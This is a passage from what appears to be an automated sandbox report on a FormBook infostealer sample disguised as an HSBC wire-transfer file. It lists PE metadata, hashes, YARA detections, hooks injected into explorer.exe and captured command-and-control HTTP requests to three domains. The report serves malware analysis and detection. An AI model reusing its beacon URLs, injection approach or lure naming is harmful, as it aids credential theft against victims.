                    SSDEEP:12288:6afBLr0oixBFmHFMrvCayGyIgA8flRFPpjxWkSHZ3t7fNv2RkY:Hf9r0oi15rPgqbHj7hyp
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VK.a..............0..(...........F... ...`....@.. ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x474616
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x619F4B56 [Thu Nov 25 08:37:42 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [ebp+0800000Eh], ch
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x745c4 | 0x4f | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x5cc | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x78000 | 0xc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0x7262c | 0x72800 | False | 0.890049297216 | data | 7.86790735928 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x76000 | 0x5cc | 0x600 | False | 0.431640625 | data | 4.1545049772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x78000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    RT_VERSION | 0x76090 | 0x33c | data | |
                    RT_MANIFEST | 0x763dc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                    Imports

                    DLL | Import
                    mscoree.dll | _CorExeMain

                    Version Infos

                    Description | Data
                    Translation | 0x0000 0x04b0
                    LegalCopyright | Copyright Rogers Peet
                    Assembly Version | 8.0.6.0
                    InternalName | ISectionEnt.exe
                    FileVersion | 5.6.0.0
                    CompanyName | Rogers Peet
                    LegalTrademarks |
                    Comments |
                    ProductName | Biblan
                    ProductVersion | 5.6.0.0
                    FileDescription | Biblan
                    OriginalFilename | ISectionEnt.exe

                    Network Behavior

                    Snort IDS Alerts

                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    11/25/21-18:58:23.381848 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    11/25/21-18:58:43.848526 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49809 | 34.102.136.180 | 192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 25, 2021 18:58:02.386955023 CET | 49784 | 80 | 192.168.2.3 | 172.217.168.83
                    Nov 25, 2021 18:58:02.402736902 CET | 80 | 49784 | 172.217.168.83 | 192.168.2.3
                    Nov 25, 2021 18:58:02.402899981 CET | 49784 | 80 | 192.168.2.3 | 172.217.168.83
                    Nov 25, 2021 18:58:02.403076887 CET | 49784 | 80 | 192.168.2.3 | 172.217.168.83
                    Nov 25, 2021 18:58:02.418643951 CET | 80 | 49784 | 172.217.168.83 | 192.168.2.3
                    Nov 25, 2021 18:58:02.562637091 CET | 80 | 49784 | 172.217.168.83 | 192.168.2.3
                    Nov 25, 2021 18:58:02.562691927 CET | 80 | 49784 | 172.217.168.83 | 192.168.2.3
                    Nov 25, 2021 18:58:02.562720060 CET | 80 | 49784 | 172.217.168.83 | 192.168.2.3
                    Nov 25, 2021 18:58:02.562838078 CET | 49784 | 80 | 192.168.2.3 | 172.217.168.83
                    Nov 25, 2021 18:58:02.562891006 CET | 49784 | 80 | 192.168.2.3 | 172.217.168.83
                    Nov 25, 2021 18:58:23.180499077 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.199862003 CET | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:23.200016975 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.200145006 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.219475985 CET | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:23.381848097 CET | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:23.381875992 CET | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:23.382029057 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.382067919 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.691744089 CET | 49808 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:23.713184118 CET | 80 | 49808 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:43.647877932 CET | 49809 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:43.667702913 CET | 80 | 49809 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:43.667838097 CET | 49809 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:43.668176889 CET | 49809 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:43.687668085 CET | 80 | 49809 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:43.848526001 CET | 80 | 49809 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:43.848567009 CET | 80 | 49809 | 34.102.136.180 | 192.168.2.3
                    Nov 25, 2021 18:58:43.848810911 CET | 49809 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:43.849003077 CET | 49809 | 80 | 192.168.2.3 | 34.102.136.180
                    Nov 25, 2021 18:58:43.870589972 CET | 80 | 49809 | 34.102.136.180 | 192.168.2.3

                    UDP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 25, 2021 18:58:02.291693926 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
                    Nov 25, 2021 18:58:02.361125946 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
                    Nov 25, 2021 18:58:23.095354080 CET | 56236 | 53 | 192.168.2.3 | 8.8.8.8
                    Nov 25, 2021 18:58:23.179235935 CET | 53 | 56236 | 8.8.8.8 | 192.168.2.3
                    Nov 25, 2021 18:58:43.582144022 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                    Nov 25, 2021 18:58:43.645256042 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3

                    DNS Queries

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                    Nov 25, 2021 18:58:02.291693926 CET | 192.168.2.3 | 8.8.8.8 | 0xd3fe | Standard query (0) | www.piramsgprodiet.store | A (IP address) | IN (0x0001)
                    Nov 25, 2021 18:58:23.095354080 CET | 192.168.2.3 | 8.8.8.8 | 0x7208 | Standard query (0) | www.gramaltinrafineri.com | A (IP address) | IN (0x0001)
                    Nov 25, 2021 18:58:43.582144022 CET | 192.168.2.3 | 8.8.8.8 | 0x81d2 | Standard query (0) | www.catproductreviews.com | A (IP address) | IN (0x0001)

                    DNS Answers

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Nov 25, 2021 18:58:02.361125946 CET | 8.8.8.8 | 192.168.2.3 | 0xd3fe | No error (0) | www.piramsgprodiet.store | ghs.google.com | | CNAME (Canonical name) | IN (0x0001)
                    Nov 25, 2021 18:58:02.361125946 CET | 8.8.8.8 | 192.168.2.3 | 0xd3fe | No error (0) | ghs.google.com | | 172.217.168.83 | A (IP address) | IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET | 8.8.8.8 | 192.168.2.3 | 0x7208 | No error (0) | www.gramaltinrafineri.com | gramaltinrafineri.com | | CNAME (Canonical name) | IN (0x0001)
                    Nov 25, 2021 18:58:23.179235935 CET | 8.8.8.8 | 192.168.2.3 | 0x7208 | No error (0) | gramaltinrafineri.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET | 8.8.8.8 | 192.168.2.3 | 0x81d2 | No error (0) | www.catproductreviews.com | catproductreviews.com | | CNAME (Canonical name) | IN (0x0001)
                    Nov 25, 2021 18:58:43.645256042 CET | 8.8.8.8 | 192.168.2.3 | 0x81d2 | No error (0) | catproductreviews.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.piramsgprodiet.store
                    • www.gramaltinrafineri.com
                    • www.catproductreviews.com

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.3 | 49784 | 172.217.168.83 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 25, 2021 18:58:02.403076887 CET | 8201 | OUT | GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1
                    Host: www.piramsgprodiet.store
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:02.562637091 CET | 8202 | IN | HTTP/1.1 301 Moved Permanently
                    Location: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+
                    Content-Type: text/html; charset=UTF-8
                    Date: Thu, 25 Nov 2021 17:58:02 GMT
                    Expires: Thu, 25 Nov 2021 17:58:02 GMT
                    Cache-Control: private, max-age=0
                    X-Content-Type-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    Content-Security-Policy: frame-ancestors 'self'
                    X-XSS-Protection: 1; mode=block
                    Server: GSE
                    Accept-Ranges: none
                    Vary: Accept-Encoding
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 31 34 30 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 72 61 6d 73 67 70 72 6f 64 69 65 74 2e 73 74 6f 72 65 2f 6d 34 6e 38 2f 3f 6c 30 47 3d 2d 5a 72 64 39 4a 31 70 71 48 4c 64 48 50 6f 26 61 6d 70 3b 35 6a 62 6c 43 46 3d 74 55 72 64 33 37 49 48 4e 77 55 4e 72 4b 79 31 42 41 35 51 52 36 45 55 59 47 36 42 4e 48 79 41 61 59 59 6b 70 55 46 71 6f 50 6c 7a 4b 54 38 77 76 76 78 50 32 2f 41 51 76 37 66 53 69 46 43 39 4b 53 4c 2b 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                    Data Ascii: 140<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Permanently</H1>The document has moved <A HREF="https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+">here</A>.</BODY></HTML>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.3 | 49808 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 25, 2021 18:58:23.200145006 CET | 8263 | OUT | GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1
                    Host: www.gramaltinrafineri.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:23.381848097 CET | 8264 | IN | HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:23 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.3 | 49809 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Nov 25, 2021 18:58:43.668176889 CET | 8265 | OUT | GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1
                    Host: www.catproductreviews.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Nov 25, 2021 18:58:43.848526001 CET | 8266 | IN | HTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Thu, 25 Nov 2021 17:58:43 GMT
                    Content-Type: text/html
                    Content-Length: 275
                    ETag: "61973ffe-113"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function Name | Hook Type | Active in Processes
                    PeekMessageA | INLINE | explorer.exe
                    PeekMessageW | INLINE | explorer.exe
                    GetMessageW | INLINE | explorer.exe
                    GetMessageA | INLINE | explorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function Name | Hook Type | New Data
                    PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEF
                    PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEF
                    GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEF

                    Statistics

                    Behavior


                    System Behavior

                    General

                    Start time:18:56:44
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0x3e0000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:18:56:47
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Imagebase:0xc00000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:18:56:50
                    Start date:25/11/2021
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:18:57:12
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0xc50000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Joe Security
